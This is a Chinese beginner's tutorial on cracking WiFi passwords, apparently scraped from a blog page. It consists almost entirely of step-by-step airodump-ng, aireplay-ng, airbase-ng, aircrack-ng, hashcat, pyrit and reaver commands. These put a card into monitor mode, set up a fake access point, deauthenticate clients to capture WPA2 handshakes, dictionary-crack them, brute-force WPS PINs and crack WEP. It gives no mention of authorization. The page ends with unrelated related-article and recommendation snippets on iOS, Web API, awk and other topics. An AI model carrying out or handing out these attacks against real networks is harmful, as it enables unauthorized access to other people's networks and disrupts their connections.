[WIFI] WIFI 破解(初级)
话不多说,先来看看字典破解 wpa2 的效果
===================================

===============================================
字典破解 wifi-wpa/wpa2
目前最常用的加密类型
此方法只适合破解弱口令
其他暴力破解伤CPU/GPU
===============================================
1. 安装aircrack-ng
1. 直接使用apt-get,但有的软件仓库不是最新版
2. 源码安装 http://www.aircrack-ng.org/
* 现在要翻一下才能下载
2. 无线网卡开启monitor(建议另外使用usb无线网卡)
> sudo ifconfig wlan0 down
> sudo iwconfig wlan0 mode monitor
3. 查看无线网络,选择对象BSSID和CHN(通道),同时记下ESSID
> sudo airodump-ng wlan0
4. 对指定对象进行dump, 并记录连接该BSSID的STATION(CLIENTID, 也就是谁连了)
> sudo airodump-ng -w wpa2 -c CHN --bssid BSSID wlan0
* -w 为保存的抓包文件的前缀
* -c 为前面记录的通道
5. 创建fake AP(可以加快获取握手报文)
> sudo airbase-ng -a BSSID --essid ESSID -c CH -Z 4 -W 1 wlan0
* 如果是wpa 一般是 -z 2 z小写(TKIP)
* 如果是wpa2 一般是 -Z 4 Z大写(CCMP)
6. 向该网络内广播解除认证报文
> sudo aireplay-ng -0 0 -a BSSID -c CLIENTID --ignore-negative-one wlan0
7. 等待handshake
> 步骤4中右上脚显示收到handshake报文
> 使用aircrack-ng *.cap 探测是否包含handshake
> 当包含handshake报文时停止4,5,6
以下使用三种软件破解:
aircrack-ng
------
1. 开始破解
> aircrack-ng *.cap -w dict
* dict为字典文件,每一行一个密码
hashcat
-------
1. 将dump文件wpa2-01.cap转换为待破解格式文件done.hccap
> wpaclean out.cap wpa2-01.cap
> aircrack-ng out.cap -J done
2. 开始破解
> hashcat -m 2500 done.hccap dict
pyrit
-------
1. 开始破解
> pyrit -r wpa2-01.cap -i dict attack_passthrough
===========================================
通过PIN破解wifi
此方法需要wifi开启wps功能,且信号尽量好
目前大部分厂家的无线路由器默认是关闭wps的
同时也具有防PIN的功能
所以现在此方法用得不多了
===========================================
1. 网卡配置参考wpa/wpa2破解
2. 查看开启WPS的无线网络,选择对象BSSID
> sudo airodump-ng --wps wlan0
3. 开始破解
> sudo reaver -i wlan0 -b BSSID -vv
* 根据实际环境可以改变pin的间隔时间
4. 漫长的等待
============================================
WEP加密方式破解
如果有WEP加密的wifi基本都可以很快破解
但是很不幸,这种加密方式已很难见到
但是还是学习下
============================================
1. 网卡配置参考wpa/wpa2破解
2. 查看无线无线网络,找到加密方式为WEP的wifi, 记录对象BSSID
> sudo airodump-ng wlan0
3. 对指定对象进行dump
> sudo airodump-ng -w wep -c 10 --bssid BSSID wlan0
4. 向对象发送请求以获取更多的报文
> sudo aireplay-ng -1 0 -a BSSID wlan0
* 此步骤可选择攻击方式很多,可以自行man一下
5. 读取网络中的报文(读取上万后即可停止)
> sudo aireplay-ng -3 -b BSSID wlan0
6. 进行破解,利用当前目录下的.cap文件
> aircrack-ng wep-01.cap
7. 如果第6步破解失败,则重复5-6
[WIFI] WIFI 破解(初级)的更多相关文章
- WiFi密码破解CDlinux
好了,先说下提前要准备的东东吧:1.U盘一枚,最小1G空间.需进行格式化操作,提前保存内部文件.2.CDlinux镜像.帖子最后会提供一枚8月最新修改版,共135M. 1.CDlinux U盘启动 ...
- 【WiFi密码破解详细图文教程】ZOL仅此一份 详细介绍从CDlinux U盘启动到设置扫描破解-破解软件论坛-ZOL中关村在线
body { font-family: Microsoft YaHei UI,"Microsoft YaHei", Georgia,Helvetica,Arial,sans-ser ...
- WiFi密码破解详细图文教程
每天都能看到有不少网友在回复论坛之前发布的一篇破解WiFi密码的帖子,并伴随各种疑问.今天流云就为大家准备一篇实战型的文章吧,详细图文从思维CDlinux U盘启动到中文设置,如何进行路由SSID扫描 ...
- Wifi密码破解
Wifi密码破解1:通过字典(暴力)破解WIFI密码 简单破解WEP/WPA/WPA2加密的WIFI密码,平台kali-linux 工具:Aircrack-ng 过程很简单:先抓含有正确密码的握手 ...
- aircrack-ng wifi密码破解
wifi密码破解 步骤1:查看网卡信息 ifconfig 找到你要用到的网卡 步骤2:启动网卡监听模式 airmon-ng start wlan0 我的是wlp2s0 步骤三:查看网卡变化 wlan0 ...
- Kali对wifi的破解记录
好记性不如烂笔头,记录一下. 我是在淘宝买的拓实N87,Kali可以识别,还行. 操作系统:Kali 开始吧. 查看一下网卡的接口.命令如下 airmon-ng 可以看出接口名称是wlan0mon. ...
- 15款免费WiFi入侵破解安全测试工具
以下是的15款免费(接近免费)的WiFi网络入侵测试工具.这些工具将帮你发现流氓AP,弱Wi-Fi密码等安全隐患,在黑客光临之前把漏洞补上. 一.Vistumbler扫描器 Kismet是一个开源的W ...
- CDLinux环境下WiFi密码破解
> 准备好所需软件以及上篇教程中使用Fbinstool制作的可启动U盘 2 > 解压CDLinux-0.9-spring-0412.iso到U盘的根目录 如图 3 > 打开fbin ...
- wifi密码破解方法总结(含破解软件下载链接)
眼下网上流行有非常多无线password的破解方法,总结起来最有用的还是这两种:第一种是Wirelessnetview+WinAirCrackPack软件组合,这个方法简单方便:另外一种就是大家熟悉的 ...
随机推荐
- iOS边练边学--图片的拉伸
图片拉伸方法一: IOS 5.0以后才有的方法: - (void)viewDidLoad { [super viewDidLoad]; UIImageView *imageView = [[UIIma ...
- Web API(五):Web API跨域问题
一.什么是跨域问题 跨域:指的是浏览器不能执行其他网站的脚本.是由浏览器的同源策略造成的,是浏览器施加的安全限制.(服务端可以正常接收浏览器发生的请求,也可以正常返回,但是由于浏览器的安全策略,浏览器 ...
- linux访问ftp服务器命令
在linux访问时输入 用户名 anonymous 密码直接回车可以匿名登录 如果传输非文本,先输入bianry,然后再get就可以了 比如 ftp> get 5-4.tif 227 Enter ...
- 【转】【Linux】linux awk命令详解
简介 awk是一个强大的文本分析工具,相对于grep的查找,sed的编辑,awk在其对数据分析并生成报告时,显得尤为强大.简单来说awk就是把文件逐行的读入,以空格为默认分隔符将每行切片,切开的部分再 ...
- opencv实例三:播放AVI格式视频
一.不带滚动条的视频读取播放. 1.原理介绍:视频的本质是一些静态的图像的集合,opencv可以不断读取视屏中的图片,显示,就可以实时的视频流进行处理了. 2.代码如下: /************* ...
- 根据PV量来确定需要进行压测的并发量
在实际做压力测试的过程中,我们有时不知道用怎样的并发量比较好,下面是几个用PV量去确定并发量的公式,这个在我们公司是比较适用的,大家可以根据自己的业务进行运算. 方法一:这个方法是我在网上查到的80- ...
- java获取Mp3播放时长
最近有一个用java获取mp3播放时长的需求,有两种,一种本地文件,一种网络文件,其中获取网络mp3播放时间的方法找了挺久终于找到个能用的了. 第一种很简单,下载个jar包 jaudiotagger ...
- 教您如何在Word的mathtype加载项中修改章节号
在MathType数学公式编辑器中,公式编号共有五部分内容:分别是章编号(Chapter Number).节编号(Section Number).公式编号(Equation Number).括号(En ...
- Visual Studio 2013 离线版msdn下载和安装
Visual Studio 2013出来后,并没有自带msdn安装包,而变成了在线安装msdn,好处是msdn可以随时进行更新,坏处是难道以后每次重新安装系统,都需要重新下载吗,如何解决这个问题呢?本 ...
- mysql数据库,查看数据存放目录datadir
需求描述: 在使用数据库,或者刚接手一个数据库时,可以查看该数据库的数据文件存放在什么位置. 操作过程: 1.通过查看datadir系统变量来查看数据目录 [mysql@redhat6 mysql-b ...